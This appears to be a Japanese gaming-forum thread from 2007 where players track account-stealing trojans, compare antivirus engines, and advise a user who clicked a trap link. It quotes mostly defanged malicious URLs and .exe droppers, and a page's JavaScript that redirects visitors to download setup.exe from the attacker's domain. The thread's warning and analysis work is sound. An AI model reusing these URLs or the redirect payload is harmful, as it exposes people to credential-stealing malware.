アンチウイルスソフトに関してはアカハックからだけでなく
自分のPCのデータを判りやすく管理する為にもお奨めしたいです。 <>
(○口○*)さん<>sage<>07/11/29 10:58 ID:Nnq19wZr0<> ライブドアにまた福建人のIDが確認された、罠Wikiも作成してる。
liu20071131
liu20071130というIDもある。
ついでにヤフーに罠ブログ&IDを確認、全部どっかの記事を丸パクリ。
blogs■yahoo■co■jp/liu20071108
これはリンクを一つだけウィルスにしたもの。
たまに見られる姑息なやり方。
blogs■yahoo■co■jp/liu20071108/9064941■html
”倉木麻衣の画像”のリンクがcaremoonになってる。
ほぼ毎日罠記事を作ってるみたい、昨日も更新があった。
他人の記事無断引用の線で通報した。 <>
(○口○*)さん<>sage<>07/11/29 12:03 ID:r7or4SkT0<> >>691
呼びだされるのはこれ。すり抜けあるけど、昨日のうちに、検体提出済みなので対応待ち。
http://www■caremoon■net/wiki/87568946.htm
http://www■caremoon■net/wiki/main.htm
http://www■caremoon■net/wiki/st.exe
http://www■caremoon■net/wiki/f2.exe
st.exe:Trojan.Win32.Inject.ix
f2.exe:Trojan-PSW.Win32.OnLineGames.fcj
st.exe
カスペ○、NOD32○、Symantec×、マカフィー×、アンラボ○
f2.exe
カスペ○、NOD32○、Symantec○、マカフィー○、アンラボ○ <>
(○口○*)さん<>sage<>07/11/29 12:17 ID:g2BPMPzX0<> >>674-676のような複数のエンジンを積んでるソフトに引かれる
しかしカスペ一本でもよくね?とも思う
そんなウイルスバスター2008の3年ライセンスを買ってしまった俺 <>
(○口○*)さん<>sage<>07/11/29 13:48 ID:gurUBIur0<> >>693
マルチエンジンは当然ながら重いし不安定になりやすい。
F-Secureも有名か。本家カスペ1本で十分だね。 <>
(○口○*)さん<>sage<>07/11/29 13:56 ID:r7or4SkT0<> すり抜けを極力減らすにはいいけど、その分CPUパワーも余分に消費するので
PCをパワーアップさせる必要がある。多コアのCPUの威力が発揮されるケースですね。
万人に勧められる訳ではないが、メリットとデメリットを理解した上で、余力のあるPCで使う
という前提条件を満たせればいいものだと思う。>マルチエンジンのセキュリティソフト <>
(○口○*)さん<>sage<>07/11/29 16:00 ID:gurUBIur0<> BitDefenderを他と共存させるとかは昔からやってた人もいたしね。 <>
(○口○*)さん<>sage<>07/11/29 16:55 ID:XGBTHihB0<> マルチエンジンが本領を発揮するのは、proxyやgatewayの役割を持たせたサーバで実行する場合かな。
delegateあたりを動かしておけば、そこでかなりの量をせき止めることが出来るし。
ハードウェアRAIDで構成されていれば、I/O処理にCPU負荷を取られないから、100%張りつきにならないのもある。 <>
(○口○*)さん<>sage<>07/11/29 18:37 ID:+MR8rKMy0<> >>696
2chのセキュスレにあるね
私もノートンメインでそれをサブで使ってる(`・ω・´) <>
(○口○*)さん<>sage<>07/11/29 18:48 ID:l8ilQtsB0<> >>693
自分も三年更新してしまったけど…
2008の推奨環境メモリを満たしていない低スペックなのに
いちおう2007より動作が軽くなって快適環境に…。
悪評も多いけど自分のPCとは相性が良かったのだろうか。
なのでお約束のカスペのオンラインスキャン併用という状態。
でも08に換えてからというもの"不正変更の確認"の"hosts変更"を"常に確認する"にしても
hosts対策で書き換えた時に、
07のようにポップアップで出たりとかして変更の確認を求められなかったりする。
こいつ本当に仕事をしているのかと心配になる事が…。
代わりに今まで通りWindowsDefenderが反応してくれるので安心ではあるのだけど。
やはり08にしてからというもの、
Defenderも右下のタスク窓に顔を出さない時があるので、そんなときは手動でDefenderを立ち上げたり。
そういう意味では心配な対策状況だったりしてます。 <>
(○口○*)さん<>sage<>07/11/30 00:04 ID:+77tNJYJ0<> 一応報告
数日前になるけど垢ハックされた?と思われるケミがプロでハックURLを連呼してた。
その後垢ハク露店っぽいのも出てた。
詳しいことは不明ですが、注意をば。 <>
(○口○*)さん<>sage<>07/11/30 04:17 ID:TqW+t5hJ0<> しかし本当にノートンは役にも立たないな。すり抜け多すぎるし、対応遅いし。
完全無防備でいるのと同じじゃねーか
カスペかNODに乗り換えるかな <>
(○口○*)さん<>sage<>07/11/30 07:20 ID:HfvVWD9B0<> NOD32も対応遅いよ。ダウンローダは対応しない(本体だけブロックできればいい)パターンも多い。
わたしは、1年間NOD32使ってきたが、更新しないでカスペに乗り換えようと思ってます。
NOD32のメリットは、ある程度強力なヒューリスティックスキャンで新種でも検知できる可能性が
あることと(最近はヒューリスティックスキャン搭載のもの多いからあまり差別化にならん)
動作の軽さ。
動作が軽く、ある程度信用できるというラインを求めるならNOD32でもいいと思うよ。 <>
(○口○*)さん<>sage<>07/11/30 07:47 ID:JPeSAFFh0<> NODはヒューリスティックに頼りすぎてシグネチャはサボり気味だからねぇ。 <>
(○口○*)さん<>sage<>07/11/30 07:50 ID:B5M0erLy0<> 軽くてそれなりに見張ってくれるのがNOD
がっちり固めたいならカスペ、ってところかもね <>
(○口○*)さん<>sage<>07/11/30 08:58 ID:ZSYS7kxo0<> シグネチャで検出しようがヒューリスティックで検出しようが、見つけてくれれば問題ない。
と思うのは自分だけだろうか?
それと個人的にはサーバOS(Win2kSvとか)にも対応してるのがポイント高かった。
他のは数万単位するんだよな……
メインのPC(XP)はカスペ、自宅鯖(Win2kSV)にはNOD32(eset)入れてる1ユーザーの意見。
知人はNOD32をメインに入れて、何かあった場合はカスペのオンラインを使ってチェックしてるらしい。
カスペ1本にしないのかと聞いたら、別種のエンジンでチェック出来た方がいいし、と言われた。 <>
(○口○*)さん<>sage<>07/11/30 09:30 ID:HfvVWD9B0<> >>705
>シグネチャで検出しようがヒューリスティックで検出しようが、見つけてくれれば問題ない。
御意。
ただ、総合スレとかに投稿された奴の検体入手してチェックしてる限りでは
言われているほどNOD32のヒューリスティックも強力じゃないなと。
>知人はNOD32をメインに入れて、何かあった場合はカスペのオンラインを使ってチェックしてるらしい。
>カスペ1本にしないのかと聞いたら、別種のエンジンでチェック出来た方がいいし、と言われた。
よくわかってる人じゃないか。いい選択だと思う。
>>703
だよねー。ダウンローダの対応が結構疎かだから、新種の場合、すり抜けの危険が上がるんだよね。
あとは表示上の不具合とか報告しても直ってこないことが幾つかあったり。
意図的に検体入手して検査させるとかしない限りは見ない画面だから問題になってないのかも。 <>
(○口○*)さん<>sage<>07/11/30 12:23 ID:C9hOHC8P0<> ノートンは前よりは定義ファイル更新速度も上がったような気がするけど
でも企業向けがメインなのか、かなり慎重なんだよなー(´・ω・`) <>
(○口○*)さん<>sage<>07/11/30 12:51 ID:HfvVWD9B0<> 読者プレゼント 11月30日版
http://internet.watch.impress.co.jp/static/present/
ソフトウェア「G DATA TotalCare 2008」 : 3名様
ソフトウェア「ESET Smart Security」 : 3名様 <>
(○口○*)さん<>sage<>07/11/30 13:15 ID:1mIQT2I20<> >>705
2k鯖使っていて、数万単位を高いと言うのも不思議な感覚だが……
それとも、MSDNだから単品OSとは訳が違うとかなのだろうか。 <>
(○口○*)さん<>sage<>07/11/30 14:50 ID:ZSYS7kxo0<> >709
一言で言えば、感覚の問題。
クライアント用が数千円で対策出来て、同機能でもサーバ用になると途端に値段が
跳ね上がるのが納得しにくいだけ。
例えばノートンなんかはネットワーク割り当てしたドライブもスキャン出来た。
今は知らないけど、以前のウィルスバスターはそれすら出来なかった。
問い合わせしたら、コーポレートエディション+ServerProtect使え、と言われた。
メル鯖立てたり何なりで、かなり注意した運用が必要なら仕方ないが、極論すれば
2kProやXPで事足りるような使い方をしてる場合でも数万〜10数万かかるってのがね……
鯖OSを個人で使ってるのが悪い、と言われたらそれまでなんだが。 <>
(○口○*)さん<>sage<>07/11/30 16:41 ID:HfvVWD9B0<> LiveROの幾つかのスレに投稿されたもの。
http://lg96■3322■org/jp/index.htm
<iframe>で下記を呼び出し。記事はITmediaからそっくりコピーの模様。
http://www■kele88■com/av/help.htm
http://www■kele88■com/av/av.exe
VirusTotalによると、本体の「av.exe」は、eSafeのみ「Suspicious File」として検知。
他のソフトはカスペも含めてすべてスルー。
呼び出し手法からみて、ほぼ間違いなくアカハックではないかと推測される。
取り敢えず、検体提出してきます。総合スレへの転記は、カスペからの返答の後で。 <>
(○口○*)さん<>sage<>07/11/30 16:44 ID:HfvVWD9B0<> 既に総合スレに記載されてた罠。orz <>
(○口○*)さん<>sage<>07/11/30 16:44 ID:j0oFlBKh0<> 端末が高性能化した現在、鯖はそんなに特別な存在ではない <>
(○口○*)さん<>sage<>07/11/30 16:54 ID:ZSYS7kxo0<> >712
スマン、先にハクスレと削除依頼スレに報告入れておいた。
他にも何箇所かのスレで爆撃確認してる。
板のTOPのスレに張ってるので、スクリプトによる自動投稿なのかも。
>713
その通りなのは判ってるんだけど、現状で不満無く安定稼動してるもので。
切り替えするタイミングが掴めない。 <>
(○口○*)さん<>sage<>07/11/30 18:13 ID:mYFn+uSV0<> やっぱり海外接続カットを延期したからまだまだいけると踏んで戻ってきたってのは、
あながち間違ってなかったのかな?
さすが癌胞やっぱり中華の味方!って感じだな・・・ <>
(○口○*)さん<>sage<>07/11/30 19:09 ID:HfvVWD9B0<> >>711-714
アカハック確定。確定情報はマルチになってもいかんので、総合スレにだけ投稿しました。
アカウントハック総合対策スレ9
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/17 <>
(○口○*)さん<>sage<>07/11/30 19:42 ID:OSgDYONS0<> >>711
2chのROと関係ないスレにも一杯張られてたなー <>
(○口○*)さん<>sage<>07/11/30 19:44 ID:Fw1pDzNN0<> ラグクジ報告スレで今回のアカハックアドレスを踏んじゃった
カワイソスは人がいるんだけど
そいつはもうダメぽなの?
垢ハックされちゃうんですか? <>
(○口○*)さん<>sage<>07/11/30 19:47 ID:4S49mdLo0<> 無関係なあなたの質問は何も意味もありません <>
(○口○*)さん<>sage<>07/11/30 19:48 ID:GuOIBwP+0<> トロイ送り込まれたのは確かじゃね
セキュソフト使ってりゃアラートぐらい出るだろうし <>
(○口○*)さん<>sage<>07/11/30 19:51 ID:B5M0erLy0<> 新型ぽいしね、ハクスレでは素早く対応してるところもあるし
カスペが即対応してるようだからオンラインスキャン行きでいいかと
まぁ踏んだってわかってるならOS入れ直した方がいいわな <>
(○口○*)さん<>sage<>07/11/30 19:54 ID:C9hOHC8P0<> 使ってるソフトにもよるんだろうなー
カスペオンラインでチェックしてそれでも心配なら再インスコしかない <>
(○口○*)さん<>sage<>07/11/30 19:56 ID:ZSYS7kxo0<> >718
取り合えず喪前様はノートンでもカスペでもいいから、アンチウィルスソフトを
買って入れて来い。
2年も更新してないなんて、論外もいいところだ。
被害者が一人減ったのは警告書いた甲斐があったというものだが、そんな状態だと
そのうち別の被害に合うぞ。
で、件の人が感染してるかどうかは、WUやってるかどうかとかで変わる。
全く何もしてないなら、確実に感染してる。 <>
(○口○*)さん<>sage<>07/11/30 21:11 ID:Q+dpOjLr0<> 当の本人です・゜・(つД`)・゜・
正直PC疎くてよくわからないから状況だけ・・・
とりあえずネカフェに行ってパスだけ変えてきた。
IDはかえかたがよくわからず・・・
URLを誤クリ→怖くなって即出る→
カスペルキーとやらでスキャンをかけ、そのままネカフェにダッシュ→
IDは変え方がよくわからずとりあえず帰還。→
カスペと同時起動で知人にやってみろっていわれた「av,exe」を検索(該当なし)→
報告中(今ココ)
正直PCにはかなり疎いもんで、PCなんてココとニコニコみるのと、
ROするくらいの知識しかない><;
>>722や>>721
のいうような再インスコやらOS入れなおしはやり方がよくわからないんだ><;
無知ですまないんだけど、詳しく教えてくれないか(´・ω・`) <>
(○口○*)さん<>sage<>07/11/30 21:14 ID:Q+dpOjLr0<> 連投スマソ;;
>>723のいうWUっていうのも詳しく知りたい <>
(○口○*)さん<>sage<>07/11/30 21:15 ID:HbEfGOa20<> ネカフェみたいな何しかけられてるかわかんないとこで
変更とかどんだけーwww
すみません僕も詳しくありません。
>>724にどなたか知恵を貸してやってください。
お願いします。 <>
(○口○*)さん<>sage<>07/11/30 21:16 ID:GuOIBwP+0<> 726が見えない <>
(○口○*)さん<>sage<>07/11/30 21:17 ID:HbEfGOa20<> WUはウィンドウズアップデートの略じゃないかな?
こいつを自動設定にしておくと勝手にウィンドウズの脆弱性とか
報告でてるのは勝手にアップデートされてインストールされるんじゃなかったっけ。 <>
(○口○*)さん<>sage<>07/11/30 21:19 ID:zD6iqy1y0<> とりあえずまずはテンプレ>1を読め
しかるべき誘導が書いてあるはずだからあとは向こうのスレでやろうか
この文が何を言ってるか分からんのならシラネ <>
(○口○*)さん<>sage<>07/11/30 21:19 ID:Q+dpOjLr0<> WUの件は了解★サンクス
いまカスペ起動してるんだが・・・同時起動でもいけるかな・w・
重くなりそうで怖いんだけど><; <>
(○口○*)さん<>sage<>07/11/30 21:21 ID:Q+dpOjLr0<> ぁぁ・・・しかるべき場所にイッテクル <>
(○口○*)さん<>sage<>07/11/30 21:21 ID:C9hOHC8P0<> WUは再起動要求されるからカスペで検査終わってからでいいんでない <>
(○口○*)さん<>sage<>07/11/30 21:24 ID:mYFn+uSV0<> うかつなネカフェも怖いぞ。
とりあえずは再インストールできるならHDDフォーマットして再インストして、
其処からパスをまた変えてください。
踏んでもパスを求められるような所
(ネトゲのログイン、アトラクションセンターやMixiやメッセンジャーなど)
にアクセスしなければ特に被害は出ませんので、
ネカフェ行く前にここで質問した方が良かったですね。 <>
(○口○*)さん<>sage<>07/11/30 21:27 ID:mYFn+uSV0<> あとOSのディスクなりを持っていれば、入れれば勝手に進めてくれるからOSインストールは楽よ。
フォーマットはものによっては入れた時にフォーマットするかどうか聞いてくれる物もあるし、
それでなければDosモードで起動して、HDDがCドライブだったらFormat :Cでやれる。
そこら辺は持っている物やOSによりますな。 <>
(○口○*)さん<>sage<>07/11/30 22:54 ID:HfvVWD9B0<> >>720
721も言ってるけど、今回のは新種なので、殆どのセキュリティソフトがスルーします。
入れてあれば安心とか思い込んじゃだめです。
ttp://www.virustotal.com/resultado.html?efeaedb64f050caee06c1314ecb11b1f
転んだ先のPG2推奨 <>
720<>sage<>07/11/30 22:57 ID:GuOIBwP+0<> 正しくは「セキュソフトが効いてりゃアラートぐらい出るだろうし」だなうん <>
(○口○*)さん<>sage<>07/11/30 23:19 ID:htQLfI0y0<> 毎回思うのですけど、向こうの報告テンプレで
hosts変更、PeerGuardian2導入欄が"有"で埋められる事が殆ど無い気がします。
それだけ踏んだ人はアカハック対策が出来ていないって事なのかも知れませんが…
ようやく出た公式告知は具体的な対策では無いし
大手ファンサイトではユーザーで行われているアカハック対策のリンクが何故か無かったりするので
言葉は知っているけど具体的な方法は判らないって事なのかも知れないですね。 <>
(○口○*)さん<>sage<>07/11/30 23:28 ID:47vXFDcQ0<> hosts変更やPG2導入してる人はそれなりにまとめサイトやこのスレなり読んでて
踏んだときの対策もわかってるだろうしね
わかってない人が踏んでからあせって駆け込むような状態になってるんだと思う <>
(○口○*)さん<>sage<>07/12/01 08:04 ID:abQ1HY3Y0<> |35 (^ー^*)ノ〜さん sage New! 07/12/01 07:50 ID:4MSrh/QL0
|処で、kingsoftのは昔の罠は消えているのか?
|中国語フォントを入れておかないと、中国語フォントがないというエラーを出すダイアログが
|同じエラーを出して泥沼だったんだが。
少なくとも姉のPCに入れた奴はそんなん出てないし、2006年に体験版入れた時も
そんなエラーは出た記憶が無い。いつの話だ?
確か、2006年に入れてみたのは、日本語版が出た時だから、かなり初期だと思うが。
# 自分のPCはNOD32ですが姉のPCはどうでもいいの入れてます。フヒヒwwwサーセンwww <>
あっちの35<>sage<>07/12/01 08:41 ID:eGcnlck70<> >>739
去年の今頃の話だったと思う。
インストーラに一部日本語化されていないところがあるらしく、
環境によってははまると言うことのよう。
まぁ、普通の環境の人には影響ないかも知れず。
ってことで、お騒がせ。 <>
(○口○*)さん<>sage<>07/12/01 09:43 ID:abQ1HY3Y0<> そっかー、その頃のは使ってないな。報告乙。
インストーラ文字化けと言えば、Spybotが酷かったが、最近直ったみたいだな。
一部残ってるけど気にならない程度までには。 <>
(○口○*)さん<>sage<>07/12/01 13:24 ID:giWrQxLU0<> 今日ROをプレイしていたら、PG2がIP「220.90.198.106:80」への送信をブロックしていました。
いきなりの事で気になったので、>>669にあった
ttp://antispam.stakasaki.net/tools/spamclaim-tools.html
で調べてみたのですが、韓国のIPであるということしかわかりませんでした。(私が無知なのもありますが…)
その後、念のためカスペで検索をかけてみましたが何も見つからず一安心しているのですが、
・ここ数日、Webサイト閲覧等行っていない
・ネットには接続、ROプレイと各種ウィルス対策ソフト更新のみ
という状況でいきなり起こったので少々不安です。
PG2のブロック履歴も確認しましたが、先日履歴をクリアしてしまったので数日分しかありませんでしたが、履歴には一度も出ていないIPでした。
PG2の追加ブロックリストは、リネージュ資料室様にある2件と、ROアカウントハック対策スレのまとめサイト様にあるRO用リストです。
質問なのですが、いきなり見ず知らずのIPに送信をするようなことはあるのでしょうか?
また、このIPに送信することは危険なのでしょうか?
その他何かありましたら教えてください。
お手数かもしれませんが、よろしくお願いします。 <>
(○口○*)さん<>sage<>07/12/01 13:36 ID:abQ1HY3Y0<> 例えば、メッセンジャーに広告が出てれば、それを読み出すために未知のサイトに
繋ごうとすることはある。
で、「220.90.198.106」なんだが、kornet・・・・・・・・spam送信元がよく経由してくる
という位しか知らない。インターネット網の結節点の1つだったと思う。
そこへの送信が危険かどうかの判断はできないが、PG2使用時の考え方としては、
実害がなければ全部ブロックしておいて構わない。 <>
(○口○*)さん<>sage<>07/12/01 15:46 ID:swRJMLax0<> 公式の対応方法が具体的じゃないというが、あれ以上は書けないと思う。
癌じゃなくても無理。
セキュリティソフトの導入やWUならともかく、hostsの変更やPG2の導入を
1企業が勧めるわけにもいかんし。
仮に癌がPG2の導入を勧めたとして、どのリストを入れるように勧める?
今使われてるリストは資料室さん含めて、全てユーザーが集めた情報。
中韓台リストなんか入れたら、アクセスできないとパニくる人が出る。
FW設定にせよhosts変更にせよ、正しい設定ってのは人による。
あたりさわりのないことしか言えない。
結局セキュリティは自分で行うもの。
海外とかで治安の悪いところに無防備で出かけてたら被害にあうのは当然。
前もって下調べや防衛策を取るのが普通。
ネットのセキュリティも同じことで基本は自己防衛。
外務省が渡航情報流すのと同じで、癌は警告を流すのが精いっぱいだろう。
まあ、今まではそれすらも満足にしてなかったんだが…… <>
(○口○*)さん<>sage<>07/12/01 16:17 ID:s/1Lwvlz0<> >744
同意。
でもFFのハク被害スレとか見てると、人によって認識に違いがあるのが良く分かるよ。
被害に遭うのは運営が悪いからだ、と責任を丸投げしてる人もいる。
個人的に、それぞれに期待する事は
癌:不正取り締まり・ハク対策についての啓蒙活動・被害時の親身で早急な対応
動:システム・プログラム的に被害が出にくいような改善
国:法的な取り締まりルールの作成(RMT関係含む)
こんな感じ。
ウィルス感染そのものは個人で対応するべき部分、って感覚だ。 <>
(○口○*)さん<>sage<>07/12/01 20:44 ID:abQ1HY3Y0<> 「怪しいサイトは開かない」では防げないWebの脅威、Symantecが動向解説
http://internet.watch.impress.co.jp/cda/news/2007/11/30/17699.html
最近の垢ハックはもろにこの手法だな <>
(○口○*)さん<>sage<>07/12/02 00:16 ID:mtlOEpDL0<> ウイルスじゃなくてもダウンローダでゴミデータを落としまくれば妨害できるわけで
やっぱりカスペ以外もダウンローダに対応して欲しいな <>
742<>sage<>07/12/02 00:31 ID:yt0T9xrf0<> 遅くなりました、ID変わってると思いますが>742です。
>743さん
おかげさまで安心できました。
念のため、もう一度カスペ等でフルスキャンをかけてから、また使用したいと思います。
ありがとうございました。 <>
(○口○*)さん<>sage<>07/12/02 01:35 ID:mvCRRnXL0<> 月1でのPCメンテしてたらPG2のログに赤ハクサイトのIPがあってさかのぼってみてたら、
いまつかってるIPになってから結構アタック食らってることが判明。
一応はじいてはいるみたいだけれどもクラック先をさがしてるっぽいポートスキャンの形跡とかもあったから注意したほうがいいかも。
アタックしてきたIP 攻撃先ポート
202.97.238.198(CNCGROUP) ポート 1026 1027
125.67.67.219と125.71.3.68と125.67.67.185(jprmthome) ポート1433、3589、4899
ここらへんが主立って攻撃してきてた。KISとPGと自前簡易FWはっててもいつ破られるが気が気じゃないのぅ。 <>
(○口○*)さん<>sage<>07/12/02 02:15 ID:QCeycr8j0<> PG2って内向きのもログ出るんだっけ? <>
(○口○*)さん<>sage<>07/12/02 03:11 ID:mvCRRnXL0<> ログに残っるものって、
時間 接続先名(IP) 送信元 送信先
ってなってるから送信元が中華の危険IPで送信先が自分のIPだった場合はアタックだとおもってたけど、
もしかして私間違ってた? <>
(○口○*)さん<>sage<>07/12/02 03:13 ID:LuClU6Yy0<> 実は感染してて漏れ出す情報を必死に食い止めてるところだったり <>
(○口○*)さん<>sage<>07/12/02 03:27 ID:mvCRRnXL0<> 一応今日やったPCメンテでカスペの完全スキャンして異常なしの上に、
日によって残ってるブロックログの頻度がまちまちだからあんまりそこ可能性はないかとは思ってる。
ただ、ちょっと気持ち悪いからメインPCではROにつながないようニシテオクカ・・・ <>
(○口○*)さん<>sage<>07/12/02 06:32 ID:jGG2wBID0<> それ、P2P使ってたりは・・・・・・ <>
(○口○*)さん<>sage<>07/12/02 08:41 ID:Q5pSCjjq0<> すいません、先ほどMixiの足跡に残ってた人のプロフのURLをうっかり踏んでしまったんですが
ttp://trots.blog20.fc2.com/
このアドレスって大丈夫なんでしょうか?
中身はぱっと見RMTのサイトなのですがアカハックかもしれないし…
私ではちょっと判断できなかったのでわかる方いらっしゃいましたらお助けくださいOTL <>
(○口○*)さん<>sage<>07/12/02 08:44 ID:PUEMSpjV0<> >>755
テンプレ嫁 <>
(○口○*)さん<>sage<>07/12/02 08:56 ID:LuClU6Yy0<> とりあえず今すぐ削除依頼してこい <>
(○口○*)さん<>sage<>07/12/02 08:59 ID:jGG2wBID0<> ■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
・危険性があるURLは「.」を「■」に置き換えて貼り付けください。 <>
(○口○*)さん<>sage<>07/12/02 09:05 ID:jGG2wBID0<> >>755
削除依頼は出してきた。
iframeタグは見つかりませんでしたが、安全だという保証はありません。
OS入れなおしでもしてこい。 <>
(○口○*)さん<>sage<>07/12/02 09:16 ID:Q5pSCjjq0<> 俺テンプレくらい嫁…OTL
>>756-759
お騒がせしました、特に>>759さん削除依頼と回答ありがとうございます <>
(○口○*)さん<>sage<>07/12/02 11:11 ID:8eDAfi8R0<> 755 :(○口○*)さん :07/12/02 08:41 ID:Q5pSCjjq0
すいません、先ほどMixiの足跡に残ってた人のプロフのURLをうっかり踏んでしまったんですが
ttp://trots■blog20■fc2■com/
このアドレスって大丈夫なんでしょうか?
中身はぱっと見RMTのサイトなのですがアカハックかもしれないし…
私ではちょっと判断できなかったのでわかる方いらっしゃいましたらお助けくださいOTL <>
(○口○*)さん<>sage<>07/12/02 11:17 ID:mvCRRnXL0<> >>754
P2Pはつかっていないぞっと。
アタックしてきてるポート番号から目的調べてみたけど、
鯖乗っ取りをかけようとしてるにしかみえないから…
まあ、IPが変わってもアタック食らってたらOS完全に入れなおしだな。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/02 11:46 ID:f4e9nNqr0<> まとめ臨時の中の人です。>>755 の物については
こちらでもソースチェッカーでhtmlソースに記述されたURL部分も幾つかチェックをかけて見ましたが
お約束の.curやら中華に転送の記述はちょっと見つけられなかったです。
お役に立てず申し訳なく。
でもややこしいのとアレなサイトなのでリストに加えてみました。 <>
(○口○*)さん<>sage<>07/12/04 15:13 ID:Ux911f4p0<> まぁネトゲやるならノートンはOS重くするだけの役立たずってこった
黙ってカスペかNOD入れとけ
そういやnPro?だったかな垢ハックウィルス除去機能があったような気がするんだが
あれ一度でも作動した奴いんの?
大抵のウィルス全てスルーしてそうなんだがw <>
(○口○*)さん<>sage<>07/12/04 16:15 ID:C0xdXmLL0<> nProはクライアントプログラム(ragexe等)をチートから守るためにあるのであって
アカハックは対象外、あっても副次的なものなので勘違いしないように。 <>
(○口○*)さん<>sage<>07/12/04 16:21 ID:m6GwV8Nr0<> >ラグナロクオンラインに対する既知の不正なプログラム(バックドア)をゲームクライアント起動時に検
>出し、隔離する機能が含まれております。
http://www.ragnarokonline.jp/playguide/hacking/hacking_03.html#t5
実験してみたいが踏み台にはなりたくないし(・∀・)キニシナイ! <>
(○口○*)さん<>sage<>07/12/04 16:30 ID:+4RnNw7k0<> >766
ハクスレの過去ログにnProが検出した時の話があったはず。
ただ更新が遅いのか検出力が低いのか知らんが、普通のアンチウィルスソフトが
先に検出するから、nProの検出はかなりレア。
実験は事故が怖いし仮想PCとか使わないと危険すぎるし、止めたほうがいい。 <>
(○口○*)さん<>sage<>07/12/04 17:05 ID:X1zgQ5K60<> 11月にやっと7月のパターンファイルに更新したくらいだからお察しもいいとこ。
ちなみにその前の更新は3月。 <>
(○口○*)さん<>sage<>07/12/04 20:28 ID:u0xxZ/g00<> 大型アップデートといい勝負だな <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/04 21:51 ID:uy87MpJR0<> ・総合対策スレ9の>44で報告のあった文字コードな表記
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/44-
この記述だとこのURLをhostsリストに追加しても
以前のIP直書き分と同じようにhostsが反応してくれない様な気がしますが
こういった場合はPG2や踏まない心がけをするしかないのかも…?
それにしても本当にあの手この手で狡猾な事です。 <>
(○口○*)さん<>sage<>07/12/05 06:09 ID:ImB+lRl30<> kele88■comで追加すれば反応するはず
何故かわからないならもうちょい基本的な所を勉強した方がいいかも <>
(○口○*)さん<>sage<>07/12/05 06:10 ID:ImB+lRl30<> www■kele88■comだった <>
(○口○*)さん<>sage<>07/12/05 07:20 ID:y05uy2xS0<> ドメインがエンコードされた状態でどう振舞うかは、ソフトウェアによるみたいだね。
IE6ではデコードしてくれるが、他のブラウザやXPのnslookupでは名前解決出来なかった。
んで、kele88は11/30の時点で補足されてるので、問題ないかと。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/05 13:57 ID:pORjM4y70<> >>771
件の物がkele88■の部分を文字コードで表記しているのは判っていたのですが
リストには改めてあの形で書かないと反応しないのかな?反応しないのであれば
これからあの手の形でやられてきたら厄介だなと。
>>773 や総合の>53で言われたように
あのURLを踏んだときにはブラウザ依存で動作が決まるそうで。
ソフト側で変換してからhostsリストを参照と
ここらへんの動作が解っていませんでした。
不勉強でお騒がせしました。ありがとうございます。 <>
(○口○*)さん<>sage<>07/12/05 14:31 ID:wfKfZilQ0<> IEがRFCを無視して余計なことをするから、そこをクラッカーに付け入られているよな。 <>
(○口○*)さん<>sage<>07/12/05 15:11 ID:oWDKzPeG0<> デコードは(ブラウザなどの)アプリ層の話なので
より下層が参照するhostsでブロックしていれば問題ない。 <>
(○口○*)さん<>sage<>07/12/05 17:52 ID:EPy8K0fD0<> 未実装システム262に投稿されてました。
ttp://www■yinra■com/inf/ <>
(○口○*)さん<>sage<>07/12/05 18:05 ID:lHRnzkHv0<> >>777
ダイレクトにsetup■exeが呼び出されるな。
今カスペのオンラインをスルーした。
ドメイン情報は出鱈目、中国北京省北京市北京らしいから。
福建人は有能なハッカーでも雇ったのかな? <>
778<>sage<>07/12/05 18:08 ID:lHRnzkHv0<> VirusTotalは凄いことに。
eSafe 7.0.15.0 2007.12.04 Suspicious File
残り全部スルー。 <>
(○口○*)さん<>sage<>07/12/05 18:08 ID:qGt9XXHr0<> >777
ソースチェッカーにかけた結果
-----------------------------------
<script language="JavaScript"><!--
if (window == top)top.location.href = "http://www■yinra■com/inf/setup.exe ";
// --></script>
-----------------------------------
これだけ。
whoisで見るとCNなので、ハク系だろうねぇ……
>Created: 2007-11-07
>Expires: 2008-11-07
と、比較的新しいドメインだし。
しかしソース見て吹いたのは自分だけだろうか?
飾り立ててない辺り、ある意味男らしい。 <>
(○口○*)さん<>sage<>07/12/05 18:12 ID:qGt9XXHr0<> 追加
nslookupすると 59■53■88■188
これは www■kele88■comのIPと同一。 <>
(○口○*)さん<><>07/12/05 18:29 ID:BXvAc4Eh0<> 一応報告まで。
ROお悩み相談所6件目
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195861100/161
ID見る限り、未実装スレと同一犯ですかね。 <>
(○口○*)さん<>sage<>07/12/05 18:32 ID:qGt9XXHr0<> >782
既ににゅぼーん済みだった。
張られたアドレスは>777と同じだったのかな? <>
(○口○*)さん<>sage<>07/12/05 18:50 ID:zHl18JiG0<> >>782
共用レンタルサーバで、別アカウントという可能性もある。
1アカウントで、ドメインごとに別ディレクトリに振り分けているって
運用もありうるから別アカウントとも断言は出来ないけど。 <>
(○口○*)さん<>sage<>07/12/05 18:55 ID:ThYDg0Or0<> >>783
同じ <>
(○口○*)さん<>sage<>07/12/05 19:08 ID:mnsHgpHa0<> >>779
カスペならすぐ対応かな <>
(○口○*)さん<>sage<>07/12/05 19:20 ID:vsjSf9Gn0<> ちょっと質問、色々貼られてる垢ハックアドを
RO公式認定のネカフェで悪質的に踏まれてたりすると
防げないのかな。 <>
(○口○*)さん<>sage<>07/12/05 19:24 ID:oaYLGXK10<> >>787
ネカフェでは、起動時と終了時、初期化されてるかどうかを確認する。 <>
(○口○*)さん<>sage<>07/12/05 19:28 ID:qGt9XXHr0<> >787
ネカフェの中には、使用後はリカバリー掛けて初期設定時に戻すタイプがある。
その場合、リカバリーする元イメージに感染してなければ安全。
でも利用者はそれを判断出来ない。
またその手の処理をしてないネカフェだと、誰かが踏んだ場合は感染済み。
結論から言えば、見知らぬPCは危険と疑って掛かった方が無難。 <>
(○口○*)さん<>sage<>07/12/05 19:38 ID:p81rEKzY0<> 垢ハクってProcessExplorer等で表示・確認できますでしょうか?
まあ、ウィルスがRO実行時に呼び出されてたりするものだと
いまいち役にはたたないわけですが <>
(○口○*)さん<>sage<>07/12/05 20:17 ID:qGt9XXHr0<> >790
試した事が無いのでなんとも言えんが、仮に表示されたとしても、その場合は
手遅れになってる可能性が高いような気がする。
それと別件。
先月末に見つかったQuickTimeのゼロデイでSecond Lifeで被害者が出たらしい。
